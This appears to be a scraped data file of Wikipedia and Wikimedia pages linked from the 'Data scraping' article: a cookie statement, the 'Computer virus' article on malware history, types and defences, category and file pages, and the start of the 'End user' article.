651 | https://en.wikipedia.org/wiki/Data_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Cookie_statement | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project. As stated in our Privacy Policy, Wikimedia believes strongly in the values of privacy and transparency. To that end, we have created this Cookie Statement as a clear reference guide to the use of cookies on Wikimedia Sites. This Cookie Statement explains how we use cookies (and other locally stored data technologies), how we use third-party cookies, and how you can manage your cookie options. For more information on our privacy practices, please visit our Privacy Policy. The Wikimedia Foundation, the non-profit organization that hosts the Wikimedia Sites, actively collects some types of information with a variety of commonly-used technologies. These generally include tracking pixels, JavaScript, and a variety of "locally stored data" technologies, such as cookies and local storage. A "cookie" is a tiny data file that we transfer onto your computer, mobile phone, or any other device that you use to access the Wikimedia Sites, and is generally used for authentication and tracking. Every cookie expires after a certain period of time, but that period varies depending on what the cookie is used for and how your browser is configured. Cookies are often categorized based on how long they remain active before they expire. A "session" cookie is one that generally expires when you close your web browser or mobile application. A "persistent" cookie is one that remains in your device, even after you close your browser or mobile application. A persistent cookie expires according to the duration set by us, or when you delete it manually. You can learn more about cookies on Wikipedia. You may remove or disable cookies through your browser settings. For more information on how to manage your cookie options, please see Section 3 of this Cookie Statement below. For more information on this and other key terms that may be relevant, please read through our Privacy Policy Glossary. Cookies are not required in order to read or edit the Wikimedia Sites. We use the information we receive from cookies and other locally stored data technologies to make your experience with the Wikimedia Sites safer and better, to gain a greater understanding of user preferences and interactions with the Wikimedia Sites, and to generally improve our services. Cookies are required in order to login and for your edits to be associated to a user account; without cookies, your edits will be anonymous and unassociated with an account. We use cookies, JavaScript, tracking pixels, and other locally stored data technologies to accomplish different purposes. Below is a list of the categories of cookies we use and what they are used for. Functionality: These cookies help the Wikimedia Sites work and are essential in order to enable you to move around the Wikimedia site and use their features. These cookies are useful for remembering your username in the login field, maintaining your session and remembering previous actions, keeping you logged in (if selected), and more. Here are a few examples: wgCookiePrefix Token This affects the threshold for how many unsuccessful login attempts trigger a notification to the user. wgCookiePrefix Session Preferences: These cookies store your preferences, so that they can be remembered the next time you use the Wikimedia Sites, for a more customized experience. These cookies are useful for recognizing and maintaining your language preference, remembering changes you have made to text size, fonts and other display preferences, so we can provide you with the look and feel that you want, and more. Here are a few examples: where watchlistMessageld is the Id of the message being hidden Performance and Analysis: These cookies count the number of visitors and collect information about how you use the Wikimedia Sites. This allows us to better understand your user experience on the Wikimedia Sites and helps us improve them for you and other users — for instance, by making sure users are finding what they need easily. Other examples include: Here are a few examples: Third-Party: We will never use third-party cookies on our wikis unless we get your permission to do so. These cookies would allow us to render services provided by third parties, such as "like" and "share" buttons. When a third party provides these kinds of services, they may require the use of a cookie in order to provide their services. If you ever come across a third-party cookie transferred to your device during your access of the Wikimedia wiki sites, where you did not take any action to authorize the use and or transfer of that cookie (such as one that may have been mistakenly placed by another user or administrator), please report that cookie to us at privacywikimedia.org. A note about Wikimedia Foundation non-wiki sites: Some non-wiki Wikimedia Foundation sites are hosted by a third-party service provider. Sites hosted by WordPress VIP may have the WordPress Stats module enabled. Stats is a service that allows us to understand how many visitors we get to our WordPress-hosted non-wiki sites, their location by country, and which pages, posts and links are the most popular. Only the Wikimedia Foundation and the service provider, Automattic WordPress, have access to the raw Stats data, which is retained for a maximum of 30 days. For more information about Stats, see WordPress' support page on the module. Sites hosted by Civilized Discourse Construction Kit, Inc., known as Discourse forums, use cookies for functionality purposes and to store preferences. Only the Wikimedia Foundation and the service provider have access to the raw data. For more information about the cookies and their retention periods, see Discourse's information about cookies. Please note that the Wikimedia Foundation has not configured its Discourse forums to use Google Analytics, serve advertisements, or process donations; Discourse cookies related to those purposes are not used in our Sites. While this is not a comprehensive list, below are some of the things that you can do to limit use of cookies and other locally stored data technologies on your device. While cookies and other locally stored data technologies may not be necessary to use our sites, some features may not function properly if you disable them. You can: Turning off the browser's cookies will prevent tracking pixels from tracking your specific activity. A tracking pixel may still record an anonymous visit from your IP address, but unique information will not be recorded. If you do not want to receive tracking pixels, you will need to disable HTML images in your browser-based email client, and that may affect your ability to view images in other emails that you receive. Please read through our Privacy Policy for more information. If you have any further questions, contact privacywikimedia.org. Thanks Please note that in the event of any differences in meaning or interpretation between the original English version of this content and a translation, the original English version takes precedence. |
652 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_virus | A computer virus 1 is a type of malware that, when executed, replicates itself by modifying other computer programs and inserting its own code into those programs. 2 3 If this replication succeeds, the affected areas are then said to be "infected" with a computer virus, a metaphor derived from biological viruses. 4 Computer viruses generally require a host program. 5 The virus writes its own code into the host program. When the program runs, the written virus program is executed first, causing infection and damage. By contrast, a computer worm does not need a host program, as it is an independent program or code chunk. Therefore, it is not restricted by the host program, but can run independently and actively carry out attacks. 6 7 Virus writers use social engineering deceptions and exploit detailed knowledge of security vulnerabilities to initially infect systems and to spread the virus. Viruses use complex anti-detection stealth strategies to evade antivirus software. 8 Motives for creating viruses can include seeking profit (e.g., with ransomware), desire to send a political message, personal amusement, to demonstrate that a vulnerability exists in software, for sabotage and denial of service, or simply because they wish to explore cybersecurity issues, artificial life and evolutionary algorithms. 9 As of 2013, computer viruses caused billions of dollars' worth of economic damage each year. 10 In response, an industry of antivirus software has cropped up, selling or freely distributing virus protection to users of various operating systems. 11 The first academic work on the theory of self-replicating computer programs was done in 1949 by John von Neumann who gave lectures at the University of Illinois about the "Theory and Organization of Complicated Automata". The work of von Neumann was later published as the "Theory of self-reproducing automata". In his essay von Neumann described how a computer program could be designed to reproduce itself. 12 Von Neumann's design for a self-reproducing computer program is considered the world's first computer virus, and he is considered to be the theoretical "father" of computer virology. 13 In 1972, Veith Risak directly building on von Neumann's work on self-replication, published his article "Selbstreproduzierende Automaten mit minimaler Informations bertragung" (Self-reproducing automata with minimal information exchange). 14 The article describes a fully functional virus written in assembler programming language for a SIEMENS 4004 35 computer system. In 1980, J rgen Kraus wrote his Diplom thesis "Selbstreproduktion bei Programmen" (Self-reproduction of programs) at the University of Dortmund. 15 In his work Kraus postulated that computer programs can behave in a way similar to biological viruses. The Creeper virus was first detected on ARPANET, the forerunner of the Internet, in the early 1970s. 16 Creeper was an experimental self-replicating program written by Bob Thomas at BBN Technologies in 1971. 17 Creeper used the ARPANET to infect DEC PDP 10 computers running the TENEX operating system. 18 Creeper gained access via the ARPANET and copied itself to the remote system where the message, "I'M THE CREEPER. CATCH ME IF YOU CAN was displayed. 19 The Reaper program was created to delete Creeper. 20 In 1982, a program called "Elk Cloner" was the first personal computer virus to appear "in the wild"—that is, outside the single computer or computer lab where it was created. 21 Written in 1981 by Richard Skrenta, a ninth grader at Mount Lebanon High School near Pittsburgh, it attached itself to the Apple DOS 3.3 operating system and spread via floppy disk. 21 On its 50th use the Elk Cloner virus would be activated, infecting the personal computer and displaying a short poem beginning "Elk Cloner: The program with a personality. In 1984, Fred Cohen from the University of Southern California wrote his paper "Computer Viruses Theory and Experiments". 22 It was the first paper to explicitly call a self-reproducing program a "virus", a term introduced by Cohen's mentor Leonard Adleman. In 1987, Fred Cohen published a demonstration that there is no algorithm that can perfectly detect all possible viruses. 23 Fred Cohen's theoretical compression virus 24 was an example of a virus which was not malicious software (malware), but was putatively benevolent (well-intentioned). However, antivirus professionals do not accept the concept of "benevolent viruses", as any desired function can be implemented without involving a virus (automatic compression, for instance, is available under Windows at the choice of the user). Any virus will by definition make unauthorised changes to a computer, which is undesirable even if no damage is done or intended. The first page of Dr Solomon's Virus Encyclopaedia explains the undesirability of viruses, even those that do nothing but reproduce. 25 26 An article that describes "useful virus functionalities" was published by J. B. Gunn under the title "Use of virus functions to provide a virtual APL interpreter under user control" in 1984. 27 The first IBM PC compatible virus in the "wild" was a boot sector virus dubbed (c)Brain, 28 created in 1986 and was released in 1987 by Amjad Farooq Alvi and Basit Farooq Alvi in Lahore, Pakistan, reportedly to deter unauthorized copying of the software they had written. 29 The first virus to specifically target Microsoft Windows, WinVir was discovered in April 1992, two years after the release of Windows 3.0. 30 The virus did not contain any Windows API calls, instead relying on DOS interrupts. A few years later, in February 1996, Australian hackers from the virus-writing crew VLAD created the Bizatch virus (also known as "Boza" virus), which was the first known virus to target Windows 95. In late 1997 the encrypted, memory-resident stealth virus Win32.Cabanas was released—the first known virus that targeted Windows NT (it was also able to infect Windows 3.0 and Windows 9x hosts). 31 Even home computers were affected by viruses. The first one to appear on the Amiga was a boot sector virus called SCA virus, which was detected in November 1987. 32 A computer virus generally contains three parts: the infection mechanism, which finds and infects new files, the payload, which is the malicious code to execute, and the trigger, which determines when to activate the payload. 33 Virus phases is the life cycle of the computer virus, described by using an analogy to biology. This life cycle can be divided into four phases: Computer viruses infect a variety of different subsystems on their host computers and software. 41 One manner of classifying viruses is to analyze whether they reside in binary executables (such as .EXE or .COM files), data files (such as Microsoft Word documents or PDF files), or in the boot sector of the host's hard drive (or some combination of all of these). 42 43 A memory-resident virus (or simply "resident virus") installs itself as part of the operating system when executed, after which it remains in RAM from the time the computer is booted up to when it is shut down. Resident viruses overwrite interrupt handling code or other functions, and when the operating system attempts to access the target file or disk sector, the virus code intercepts the request and redirects the control flow to the replication module, infecting the target. In contrast, a non-memory-resident virus (or "non-resident virus"), when executed, scans the disk for targets, infects them, and then exits (i.e. it does not remain in memory after it is done executing). 44 Many common applications, such as Microsoft Outlook and Microsoft Word, allow macro programs to be embedded in documents or emails, so that the programs may be run automatically when the document is opened. A macro virus (or "document virus") is a virus that is written in a macro language and embedded into these documents so that when users open the file, the virus code is executed, and can infect the user's computer. This is one of the reasons that it is dangerous to open unexpected or suspicious attachments in e-mails. 45 46 While not opening attachments in e-mails from unknown persons or organizations can help to reduce the likelihood of contracting a virus, in some cases, the virus is designed so that the e-mail appears to be from a reputable organization (e.g., a major bank or credit card company). Boot sector viruses specifically target the boot sector and or the Master Boot Record 47 (MBR) of the host's hard disk drive, solid-state drive, or removable storage media (flash drives, floppy disks, etc.). 48 The most common way of transmission of computer viruses in boot sector is physical media. When reading the VBR of the drive, the infected floppy disk or USB flash drive connected to the computer will transfer data, and then modify or replace the existing boot code. The next time a user tries to start the desktop, the virus will immediately load and run as part of the master boot record. 49 Email viruses are viruses that intentionally, rather than accidentally, use the email system to spread. While virus infected files may be accidentally sent as email attachments, email viruses are aware of email system functions. They generally target a specific type of email system (Microsoft Outlook is the most commonly used), harvest email addresses from various sources, and may append copies of themselves to all email sent, or may generate email messages containing copies of themselves as attachments. 50 To avoid detection by users, some viruses employ different kinds of deception. Some old viruses, especially on the DOS platform, make sure that the "last modified" date of a host file stays the same when the file is infected by the virus. This approach does not fool antivirus software, however, especially those which maintain and date cyclic redundancy checks on file changes. 51 Some viruses can infect files without increasing their sizes or damaging the files. They accomplish this by overwriting unused areas of executable files. These are called cavity viruses. For example, the CIH virus, or Chernobyl Virus, infects Portable Executable files. Because those files have many empty gaps, the virus, which was 1 KB in length, did not add to the size of the file. 52 Some viruses try to avoid detection by killing the tasks associated with antivirus software before it can detect them (for example, Conficker). A Virus may also hide its presence using a rootkit by not showing itself on the list of system processes or by disguising itself within a trusted process. 53 In the 2010s, as computers and operating systems grow larger and more complex, old hiding techniques need to be updated or replaced. Defending a computer against viruses may demand that a file system migrate towards detailed and explicit permission for every kind of file access. citation needed In addition, only a small fraction of known viruses actually cause real incidents, primarily because many viruses remain below the theoretical epidemic threshold. 54 While some kinds of antivirus software employ various techniques to counter stealth mechanisms, once the infection occurs any recourse to "clean" the system is unreliable. In Microsoft Windows operating systems, the NTFS file system is proprietary. This leaves antivirus software little alternative but to send a "read" request to Windows files that handle such requests. Some viruses trick antivirus software by intercepting its requests to the operating system. A virus can hide by intercepting the request to read the infected file, handling the request itself, and returning an uninfected version of the file to the antivirus software. The interception can occur by code injection of the actual operating system files that would handle the read request. Thus, an antivirus software attempting to detect the virus will either not be permitted to read the infected file, or, the "read" request will be served with the uninfected version of the same file. 55 The only reliable method to avoid "stealth" viruses is to boot from a medium that is known to be "clear". Security software can then be used to check the dormant operating system files. Most security software relies on virus signatures, or they employ heuristics. 56 57 Security software may also use a database of file "hashes" for Windows OS files, so the security software can identify altered files, and request Windows installation media to replace them with authentic versions. In older versions of Windows, file cryptographic hash functions of Windows OS files stored in Windows—to allow file integrity authenticity to be checked—could be overwritten so that the System File Checker would report that altered system files are authentic, so using file hashes to scan for altered files would not always guarantee finding an infection. 58 Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them for so-called virus signatures. 59 Different antivirus programs will employ different search methods when identifying viruses. If a virus scanner finds such a pattern in a file, it will perform other checks to make sure that it has found the virus, and not merely a coincidental sequence in an innocent file, before it notifies the user that the file is infected. The user can then delete, or (in some cases) "clean" or "heal" the infected file. Some viruses employ techniques that make detection by means of signatures difficult but probably not impossible. These viruses modify their code on each infection. That is, each infected file contains a different variant of the virus. citation needed One method of evading signature detection is to use simple encryption to encipher (encode) the body of the virus, leaving only the encryption module and a static cryptographic key in cleartext which does not change from one infection to the next. 60 In this case, the virus consists of a small decrypting module and an encrypted copy of the virus code. If the virus is encrypted with a different key for each infected file, the only part of the virus that remains constant is the decrypting module, which would (for example) be appended to the end. In this case, a virus scanner cannot directly detect the virus using signatures, but it can still detect the decrypting module, which still makes indirect detection of the virus possible. Since these would be symmetric keys, stored on the infected host, it is entirely possible to decrypt the final virus, but this is probably not required, since self-modifying code is such a rarity that finding some may be reason enough for virus scanners to at least "flag" the file as suspicious. citation needed An old but compact way will be the use of arithmetic operation like addition or subtraction and the use of logical conditions such as XORing, 61 where each byte in a virus is with a constant so that the exclusive-or operation had only to be repeated for decryption. It is suspicious for a code to modify itself, so the code to do the encryption decryption may be part of the signature in many virus definitions. citation needed A simpler older approach did not use a key, where the encryption consisted only of operations with no parameters, like incrementing and decrementing, bitwise rotation, arithmetic negation, and logical NOT. 61 Some viruses, called polymorphic viruses, will employ a means of encryption inside an executable in which the virus is encrypted under certain events, such as the virus scanner being disabled for updates or the computer being rebooted. 62 This is called cryptovirology. Polymorphic code was the first technique that posed a serious threat to virus scanners. Just like regular encrypted viruses, a polymorphic virus infects files with an encrypted copy of itself, which is decoded by a decryption module. In the case of polymorphic viruses, however, this decryption module is also modified on each infection. A well-written polymorphic virus therefore has no parts which remain identical between infections, making it very difficult to detect directly using "signatures". 63 64 Antivirus software can detect it by decrypting the viruses using an emulator, or by statistical pattern analysis of the encrypted virus body. To enable polymorphic code, the virus has to have a polymorphic engine (also called "mutating engine" or "mutation engine") somewhere in its encrypted body. See polymorphic code for technical detail on how such engines operate. 65 Some viruses employ polymorphic code in a way that constrains the mutation rate of the virus significantly. For example, a virus can be programmed to mutate only slightly over time, or it can be programmed to refrain from mutating when it infects a file on a computer that already contains copies of the virus. The advantage of using such slow polymorphic code is that it makes it more difficult for antivirus professionals and investigators to obtain representative samples of the virus, because "bait" files that are infected in one run will typically contain identical or similar samples of the virus. This will make it more likely that the detection by the virus scanner will be unreliable, and that some instances of the virus may be able to avoid detection. To avoid being detected by emulation, some viruses rewrite themselves completely each time they are to infect new executables. Viruses that utilize this technique are said to be in metamorphic code. To enable metamorphism, a "metamorphic engine" is needed. A metamorphic virus is usually very large and complex. For example, W32 Simile consisted of over 14,000 lines of assembly language code, 90% of which is part of the metamorphic engine. 66 67 Damage is due to causing system failure, corrupting data, wasting computer resources, increasing maintenance costs or stealing personal information. 10 Even though no antivirus software can uncover all computer viruses (especially new ones), computer security researchers are actively searching for new ways to enable antivirus solutions to more effectively detect emerging viruses, before they become widely distributed. 68 A power virus is a computer program that executes specific machine code to reach the maximum CPU power dissipation (thermal energy output for the central processing units). 69 Computer cooling apparatus are designed to dissipate power up to the thermal design power, rather than maximum power, and a power virus could cause the system to overheat if it does not have logic to stop the processor. This may cause permanent physical damage. Power viruses can be malicious, but are often suites of test software used for integration testing and thermal testing of computer components during the design phase of a product, or for product benchmarking. 70 Stability test applications are similar programs which have the same effect as power viruses (high CPU usage) but stay under the user's control. They are used for testing CPUs, for example, when overclocking. Spinlock in a poorly written program may cause similar symptoms, if it lasts sufficiently long. Different micro-architectures typically require different machine code to hit their maximum power. Examples of such machine code do not appear to be distributed in CPU reference materials. 71 As software is often designed with security features to prevent unauthorized use of system resources, many viruses must exploit and manipulate security bugs, which are security defects in a system or application software, to spread themselves and infect other computers. Software development strategies that produce large numbers of "bugs" will generally also produce potential exploitable "holes" or "entrances" for the virus. To replicate itself, a virus must be permitted to execute code and write to memory. For this reason, many viruses attach themselves to executable files that may be part of legitimate programs (see code injection). If a user attempts to launch an infected program, the virus' code may be executed simultaneously. 72 In operating systems that use file extensions to determine program associations (such as Microsoft Windows), the extensions may be hidden from the user by default. This makes it possible to create a file that is of a different type than it appears to the user. For example, an executable may be created and named "picture.png.exe", in which the user sees only "picture.png" and therefore assumes that this file is a digital image and most likely is safe, yet when opened, it runs the executable on the client machine. 73 Viruses may be installed on removable media, such as flash drives. The drives may be left in a parking lot of a government building or other target, with the hopes that curious users will insert the drive into a computer. In a 2015 experiment, researchers at the University of Michigan found that 45 98 percent of users would plug in a flash drive of unknown origin. 74 The vast majority of viruses target systems running Microsoft Windows. This is due to Microsoft's large market share of desktop computer users. 75 The diversity of software systems on a network limits the destructive potential of viruses and malware. a Open-source operating systems such as Linux allow users to choose from a variety of desktop environments, packaging tools, etc., which means that malicious code targeting any of these systems will only affect a subset of all users. Many Windows users are running the same set of applications, enabling viruses to rapidly spread among Microsoft Windows systems by targeting the same exploits on large numbers of hosts. 76 77 78 79 While Linux and Unix in general have always natively prevented normal users from making changes to the operating system environment without permission, Windows users are generally not prevented from making these changes, meaning that viruses can easily gain control of the entire system on Windows hosts. This difference has continued partly due to the widespread use of administrator accounts in contemporary versions like Windows XP. In 1997, researchers created and released a virus for Linux—known as "Bliss". 80 Bliss, however, requires that the user run it explicitly, and it can only infect programs that the user has the access to modify. Unlike Windows users, most Unix users do not log in as an administrator, or "root user", except to install or configure software; as a result, even if a user ran the virus, it could not harm their operating system. The Bliss virus never became widespread, and remains chiefly a research curiosity. Its creator later posted the source code to Usenet, allowing researchers to see how it worked. 81 Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk, usually inadvertently. Personal computers of the era would attempt to boot first from a floppy if one had been left in the drive. Until floppy disks fell out of use, this was the most successful infection strategy and boot sector viruses were the most common in the "wild" for many years. Traditional computer viruses emerged in the 1980s, driven by the spread of personal computers and the resultant increase in bulletin board system (BBS), modem use, and software sharing. Bulletin board driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software. Shareware and bootleg software were equally common vectors for viruses on BBSs. 82 83 Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by other computers. 84 Macro viruses have become common since the mid 1990s. Most of these viruses are written in the scripting languages for Microsoft programs such as Microsoft Word and Microsoft Excel and spread throughout Microsoft Office by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most could also spread to Macintosh computers. Although most of these viruses did not have the ability to send infected email messages, those viruses which did take advantage of the Microsoft Outlook Component Object Model (COM) interface. 85 86 Some old versions of Microsoft Word allow macros to replicate themselves with additional blank lines. If two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a "mating" of the two and would likely be detected as a virus unique from the "parents". 87 A virus may also send a web address link as an instant message to all the contacts (e.g., friends and colleagues' e-mail addresses) stored on an infected machine. If the recipient, thinking the link is from a friend (a trusted source) follows the link to the website, the virus hosted at the site may be able to infect this new computer and continue propagating. 88 Viruses that spread using cross-site scripting were first reported in 2002, 89 and were academically demonstrated in 2005. 90 There have been multiple instances of the cross-site scripting viruses in the "wild", exploiting websites such as MySpace (with the Samy worm) and Yahoo . In 1989 The ADAPSO Software Industry Division published Dealing With Electronic Vandalism, 91 in which they followed the risk of data loss by "the added risk of losing customer confidence. 92 93 94 Many users install antivirus software that can detect and eliminate known viruses when the computer attempts to download or run the executable file (which may be distributed as an email attachment, or on USB flash drives, for example). Some antivirus software blocks known malicious websites that attempt to install malware. Antivirus software does not change the underlying capability of hosts to transmit viruses. Users must update their software regularly to patch security vulnerabilities ("holes"). Antivirus software also needs to be regularly updated to recognize the latest threats. This is because malicious hackers and other individuals are always creating new viruses. The German AV-TEST Institute publishes evaluations of antivirus software for Windows 95 and Android. 96 Examples of Microsoft Windows anti virus and anti-malware software include the optional Microsoft Security Essentials 97 (for Windows XP, Vista and Windows 7) for real-time protection, the Windows Malicious Software Removal Tool 98 (now included with Windows (Security) Updates on "Patch Tuesday", the second Tuesday of each month), and Windows Defender (an optional download in the case of Windows XP). 99 Additionally, several capable antivirus software programs are available for free download from the Internet (usually restricted to non-commercial use). 100 Some such free programs are almost as good as commercial competitors. 101 Common security vulnerabilities are assigned CVE IDs and listed in the US National Vulnerability Database. Secunia PSI 102 is an example of software, free for personal use, that will check a PC for vulnerable out-of-date software, and attempt to update it. Ransomware and phishing scam alerts appear as press releases on the Internet Crime Complaint Center noticeboard. Ransomware is a virus that posts a message on the user's screen saying that the screen or system will remain locked or unusable until a ransom payment is made. Phishing is a deception in which the malicious individual pretends to be a friend, computer security expert, or other benevolent individual, with the goal of convincing the targeted individual to reveal passwords or other personal information. Other commonly used preventive measures include timely operating system updates, software updates, careful Internet browsing (avoiding shady websites), and installation of only trusted software. 103 Certain browsers flag sites that have been reported to Google and that have been confirmed as hosting malware by Google. 104 105 There are two common methods that an antivirus software application uses to detect viruses, as described in the antivirus software article. The first, and by far the most common method of virus detection is using a list of virus signature definitions. This works by examining the content of the computer's memory (its Random Access Memory (RAM), and boot sectors) and the files stored on fixed or removable drives (hard drives, floppy drives, or USB flash drives), and comparing those files against a database of known virus "signatures". Virus signatures are just strings of code that are used to identify individual viruses; for each virus, the antivirus designer tries to choose a unique signature string that will not be found in a legitimate program. Different antivirus programs use different "signatures" to identify viruses. The disadvantage of this detection method is that users are only protected from viruses that are detected by signatures in their most recent virus definition update, and not protected from new viruses (see "zero-day attack"). 106 A second method to find viruses is to use a heuristic algorithm based on common virus behaviors. This method can detect new viruses for which antivirus security firms have yet to define a "signature", but it also gives rise to more false positives than using signatures. False positives can be disruptive, especially in a commercial environment, because it may lead to a company instructing staff not to use the company computer system until IT services have checked the system for viruses. This can slow down productivity for regular workers. One may reduce the damage done by viruses by making regular backups of data (and the operating systems) on different media, that are either kept unconnected to the system (most of the time, as in a hard drive), read-only or not accessible for other reasons, such as using different file systems. This way, if data is lost through a virus, one can start again using the backup (which will hopefully be recent). 107 If a backup session on optical media like CD and DVD is closed, it becomes read-only and can no longer be affected by a virus (so long as a virus or infected file was not copied onto the CD DVD). Likewise, an operating system on a bootable CD can be used to start the computer if the installed operating systems become unusable. Backups on removable media must be carefully inspected before restoration. The Gammima virus, for example, propagates via removable flash drives. 108 109 Many websites run by antivirus software companies provide free online virus scanning, with limited "cleaning" facilities (after all, the purpose of the websites is to sell antivirus products and services). Some websites—like Google subsidiary VirusTotal.com—allow users to upload one or more suspicious files to be scanned and checked by one or more antivirus programs in one operation. 110 111 Additionally, several capable antivirus software programs are available for free download from the Internet (usually restricted to non-commercial use). 112 Microsoft offers an optional free antivirus utility called Microsoft Security Essentials, a Windows Malicious Software Removal Tool that is updated as part of the regular Windows update regime, and an older optional anti-malware (malware removal) tool Windows Defender that has been upgraded to an antivirus product in Windows 8. Some viruses disable System Restore and other important Windows tools such as Task Manager and CMD. An example of a virus that does this is CiaDoor. Many such viruses can be removed by rebooting the computer, entering Windows "safe mode" with networking, and then using system tools or Microsoft Safety Scanner. 113 System Restore on Windows Me, Windows XP, Windows Vista and Windows 7 can restore the registry and critical system files to a previous checkpoint. Often a virus will cause a system to "hang" or "freeze", and a subsequent hard reboot will render a system restore point from the same day corrupted. Restore points from previous days should work, provided the virus is not designed to corrupt the restore files and does not exist in previous restore points. 114 115 Microsoft's System File Checker (improved in Windows 7 and later) can be used to check for, and repair, corrupted system files. 116 Restoring an earlier "clean" (virus-free) copy of the entire partition from a cloned disk, a disk image, or a backup copy is one solution—restoring an earlier backup disk "image" is relatively simple to do, usually removes any malware, and may be faster than "disinfecting" the computer—or reinstalling and reconfiguring the operating system and programs from scratch, as described below, then restoring user preferences. 107 Reinstalling the operating system is another approach to virus removal. It may be possible to recover copies of essential user data by booting from a live CD, or connecting the hard drive to another computer and booting from the second computer's operating system, taking great care not to infect that computer by executing any infected programs on the original drive. The original hard drive can then be reformatted and the OS and all programs installed from original media. Once the system has been restored, precautions must be taken to avoid reinfection from any restored executable files. 117 The first known description of a self-reproducing program in fiction is in the 1970 short story The Scarred Man by Gregory Benford which describes a computer program called VIRUS which, when installed on a computer with telephone modem dialing capability, randomly dials phone numbers until it hits a modem that is answered by another computer, and then attempts to program the answering computer with its own program, so that the second computer will also begin dialing random numbers, in search of yet another computer to program. The program rapidly spreads exponentially through susceptible computers and can only be countered by a second program called VACCINE. 118 His story was based on an actual computer virus written in FORTRAN that Benford had created and run on the lab computer in the 1960s, as a proof-of-concept, and which he told John Brunner about in 1970. 119 The idea was explored further in two 1972 novels, When HARLIE Was One by David Gerrold and The Terminal Man by Michael Crichton, and became a major theme of the 1975 novel The Shockwave Rider by John Brunner. 120 The 1973 Michael Crichton sci-fi film Westworld made an early mention of the concept of a computer virus, being a central plot theme that causes androids to run amok. 121 better source needed Alan Oppenheimer's character summarizes the problem by stating that ...there's a clear pattern here which suggests an analogy to an infectious disease process, spreading from one...area to the next. To which the replies are stated: "Perhaps there are superficial similarities to disease" and, "I must confess I find it difficult to believe in a disease of machinery. 122 The term "virus" is also misused by extension to refer to other types of malware. "Malware" encompasses computer viruses along with many other forms of malicious software, such as computer "worms", ransomware, spyware, adware, trojan horses, keyloggers, rootkits, bootkits, malicious Browser Helper Object (BHOs), and other malicious software. The majority of active malware threats are trojan horse programs or computer worms rather than computer viruses. The term computer virus, coined by Fred Cohen in 1985, is a misnomer. 123 Viruses often perform some type of harmful activity on infected host computers, such as acquisition of hard disk space or central processing unit (CPU) time, accessing and stealing private information (e.g., credit card numbers, debit card numbers, phone numbers, names, email addresses, passwords, bank information, house addresses, etc.), corrupting data, displaying political, humorous or threatening messages on the user's screen, spamming their e-mail contacts, logging their keystrokes, or even rendering the computer useless. However, not all viruses carry a destructive "payload" and attempt to hide themselves—the defining characteristic of viruses is that they are self-replicating computer programs that modify other software without user consent by injecting themselves into the said programs, similar to a biological virus which replicates within living cells. |
653 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Category:Articles_with_short_description | This category is for articles with short descriptions defined on Wikipedia by short description (either within the page itself or via another template). This category has the following 4 subcategories, out of 4 total. The following 200 pages are in this category, out of approximately 5,607,063 total. This list may not reflect recent changes. |
654 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/File:CIAJMK1209-en.svg | Original file (SVG file, nominally 496 496 pixels, file size: 177 KB) Click on a date time to view the file as it appeared at that time. More than 100 pages use this file. The following list shows the first 100 pages that use this file only. A full list is available. View more links to this file. The following other wikis use this file: View more global usage of this file. This file contains additional information, probably added from the digital camera or scanner used to create or digitize it. If the file has been modified from its original state, some details may not fully reflect the modified file. |
655 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:Articles_with_limited_geographic_scope_from_October_2015 | This category combines all articles with limited geographic scope from October 2015 (2015 10) to enable us to work through the backlog more systematically. It is a member of Category:Articles with limited geographic scope. The following 26 pages are in this category, out of 26 total. This list may not reflect recent changes. |
656 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/End-user_(computer_science) | In product development, an end user (sometimes end-user) a is a person who ultimately uses or is intended to ultimately use a product. 1 2 3 The end user stands in contrast to users who support or maintain the product, 4 such as sysops, system administrators, database administrators, 5 information technology (IT) experts, software professionals, and computer technicians. End users typically do not possess the technical understanding or skill of the product designers, 6 a fact easily overlooked and forgotten by designers: leading to features creating low customer satisfaction. 2 In information technology, end users are not customers in the usual sense—they are typically employees of the customer. 7 For example, if a large retail corporation buys a software package for its employees to use, even though the large retail corporation was the customer that purchased the software, the end users are the employees of the company, who will use the software at work. End users are one of the three major factors contributing to the complexity of managing information systems. The end user's position has changed from a position in the 1950s (where end users did not interact with the mainframe; computer experts programmed and ran the mainframe) to one in the 2010s where the end user collaborates with and advises the management information system and Information Technology department about his or her needs regarding the system or product. This raises new questions, such as: Who manages each resource?, What is the role of the MIS Department? and What is the optimal relationship between the end-user and the MIS Department? 8 The concept of end-user first surfaced in the late 1980s and has since then raised many debates. One challenge was the goal to give both the user more freedom, by adding advanced features and functions (for more advanced users) and adding more constraints (to prevent a neophyte user from accidentally erasing an entire company's database). 9 This phenomenon appeared as a consequence of consumerization of computer products and software. In the 1960s and 1970s, computer users were generally programming experts and computer scientists. However, in the 1980s, and especially in the mid-to-late 1990s and the early 2000s, everyday, regular people began using computer devices and software for personal and work use. IT specialists needed to cope with this trend in various ways. In the 2010s, users now want to have more control over the systems they operate, to solve their own problems, and be able to customize the systems to suit their needs. The apparent drawbacks were the risk of corruption of the systems and data the users had control of, due to their lack of knowledge on how to properly operate the computer software at an advanced level. 10 For companies to appeal to the user, it took primary care to accommodate and think of end-users in their new products, software launches, and updates. A partnership needed to be formed between the programmer-developers and the everyday end users so both parties could maximize the use of the products effectively. 11 A major example of the public's effects on end user's requirements were the public libraries. They have been affected by new technologies in many ways, ranging from the digitalization of their card catalog, the shift to e-books, e-journals, and offering online services. Libraries have had to undergo many changes in order to cope, 12 including training existing librarians in Web 2.0 and database skills, to hiring IT and software experts. The aim of end user documentation (e.g., manuals and guidebooks for products) is to help the user understand certain aspects of the systems and to provide all the answers in one place. 13 A lot of documentation is available for 